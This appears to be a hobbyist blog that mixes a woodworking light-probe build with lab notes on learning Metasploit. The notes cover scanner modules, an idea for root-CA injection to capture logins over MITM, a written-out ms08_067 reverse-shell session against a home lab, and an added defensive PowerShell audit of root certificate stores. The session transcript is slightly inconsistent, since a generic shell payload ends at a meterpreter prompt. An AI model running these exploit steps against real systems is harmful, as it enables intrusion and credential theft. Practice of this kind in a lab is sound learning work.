Light Probe – More Woodworking

Got into the shop and (crudely) built out the next part of the light arm. I have a seemingly endless supply of scrap 3/4″ plywood lying around, so that’s what I used. Made the lower part of the rotating mechanism 10 cm square, then rounded the corners for effect. The vertical part of the rotating mechanism is a simple 10 cm by 12 cm. I recessed the servo just like last time. Finally, I attached a 1/2″ x 1/2″ piece of scrap basswood to the vertical-axis servo. Ugly as sin, but it works well enough.

Here you can see the unit disassembled into its two pieces. To assemble it I just slide the servo horn onto the shaft.

Here’s the unit assembled. The top portion spins on the X axis and the arm spins on the Y axis. I’m going to attach the photoresistors to a mechanism at the end of the arm.

That’s it for now.

Messing Around in Metasploit

Over lunch break I’ve just been reading up on some general things you can do in Metasploit. Been playing with some misc. modules such as:

  • auxiliary/scanner/portscan/syn
  • auxiliary/scanner/portscan/tcp
  • auxiliary/scanner/smb/smb_version

I also learned about the IP Idle Scan technique. Very clever indeed. There’s a module for that too: scanner/ip/ipidseq.

References:
https://www.offensive-security.com/metasploit-unleashed/port-scanning/
https://nmap.org/book/idlescan.html

Injecting Certificates?

Tonight I’m messing around with post/windows/manage/inject_ca. Specifically trying to get it to work. Seems like a handy little item to have for SSL-based MITM attacks. Create a root CA, use an exploit to add it to the root of a target, then lay low and wait for web logins. Doubly useful for those HSTS-secured sites…

I didn’t realize that certificates are just stored as binary blobs in the registry. Neat.
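The flip side of that observation is the defender’s check: a root CA the machine owner never installed is exactly the artefact this kind of post-exploitation leaves behind, and because the store lives in the registry it can be audited like any other registry data. The PowerShell below is an added example, not code from the original post or from the Metasploit module; it enumerates the trusted root stores through the Cert: provider, compares the thumbprints against a known-good baseline, and for each unexpected certificate reports the registry key that holds its blob. The baseline thumbprints are constructed placeholders; a real baseline would be exported from a clean reference image of the same OS build.

```powershell
# Added example (not from the original post): report trusted root CAs that are not on a
# known-good baseline, and show where each one lives in the registry.

# Constructed placeholder baseline. Replace with thumbprints exported from a clean build.
$Baseline = @(
    'PLACEHOLDER-THUMBPRINT-0000000000000000000000000000000000000001',
    'PLACEHOLDER-THUMBPRINT-0000000000000000000000000000000000000002'
)

# The Cert: drive is a view over the same data the post mentions: one registry key per
# certificate, named by thumbprint, holding the encoded certificate in a binary "Blob" value.
$RegistryRoots = @{
    LocalMachine = 'HKLM:\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates'
    CurrentUser  = 'HKCU:\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates'
}

function Get-UnexpectedRootCA {
    param(
        [Parameter(Mandatory)] [string[]] $KnownThumbprints
    )

    foreach ($location in $RegistryRoots.Keys) {
        Get-ChildItem -Path "Cert:\$location\Root" -ErrorAction SilentlyContinue |
            Where-Object { $KnownThumbprints -notcontains $_.Thumbprint } |
            ForEach-Object {
                $key = Join-Path $RegistryRoots[$location] $_.Thumbprint
                [pscustomobject]@{
                    StoreLocation = $location
                    Thumbprint    = $_.Thumbprint
                    Subject       = $_.Subject
                    SelfSigned    = ($_.Subject -eq $_.Issuer)
                    NotBefore     = $_.NotBefore
                    NotAfter      = $_.NotAfter
                    RegistryKey   = $key
                    # Confirms the blob really is in the registry and gives a path to pivot
                    # into registry auditing (who wrote it, and when) with other tooling.
                    InRegistry    = Test-Path -Path $key
                }
            }
    }
}

# Newest-issued certificates first: a freshly minted self-signed root is the usual tell.
Get-UnexpectedRootCA -KnownThumbprints $Baseline |
    Sort-Object NotBefore -Descending |
    Format-Table -AutoSize
```

Run it from an elevated prompt so the LocalMachine store enumerates fully. Anything it lists that is self-signed, recently issued, and absent from the baseline deserves a closer look before the next browser session on that host.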

Also, XP SP3 just straight up doesn’t understand SHA512. At all. I had to apply a hotfix to get it up and running.

References:
https://labs.mwrinfosecurity.com/blog/masquerading-as-a-windows-system-binary-using-digital-signatures/
https://support.microsoft.com/en-us/help/968730/windows-server-2003-and-windows-xp-clients-cannot-obtain-certificates

Mastering the Obvious

Today I learned the difference between true meterpreter and the reverse shell. Previously I had used meterpreter to get a shell. Didn’t know you could just have it give you one. Though I’ve found it somewhat inconvenient not having the full meterpreter suite available, so my preference is definitely the meterpreter over the straight reverse shell.

windows/meterpreter/reverse_tcp == Standard Meterpreter
generic/shell_reverse_tcp == command prompt. Yes, duh, a shell.

Also found this nifty cheat sheet. (PDF warning)

Clubbing Baby Seals

So to get some practice I’ve built a lab of obscenely vulnerable Windows client machines. While this doesn’t really represent any kind of real-world situation, it’s been a good place for me to play around and test things while actually seeing some results. Though it does kind of feel like clubbing a baby seal at times.

  • XP SP3 or unpatched 7.
  • Adobe Reader 8.0
  • Adobe Air 20.0.0.204
  • Adobe Flash 18.0.0.194
  • Chrome 22.0.1229.0
  • Firefox 17.0
  • Java JRE 7 update 2
  • Realplayer 15.0.5.109
  • Shockwave 11.0.3.471

The process goes like this. Install OS, join domain, install all the software, configure the profile, snapshot the VM, ready for use!

The first tests I’ve been doing have all been MITM based browser attacks, but today I felt like being a bit more direct.

I initially tried using exploit/windows/dcerpc/ms03_026_dcom. The first run indicated the port wasn’t open, which made sense because I never opened that port on the target. So I created a file share to “prime the pump”. Still no dice.

Next up was exploit/windows/smb/ms08_067_netapi. This one worked, and I got a shell. I’m documenting the actual text below so I have it for later.

root@KALI:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100 (target)
msf exploit(ms08_067_netapi) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.50 (Kali)
msf exploit(ms08_067_netapi) > exploit
meterpreter > (Success!)

I’ll probably mess around more later today.

Fixing “Database not connected or cache not built” in Metasploit

Configure the database service to start automatically
update-rc.d postgresql enable

Initialize the database
msfdb init

Launch msfconsole and rebuild the cache
root@KALI:~# msfconsole
msf > db_rebuild_cache

Wait for a while. It will finish eventually.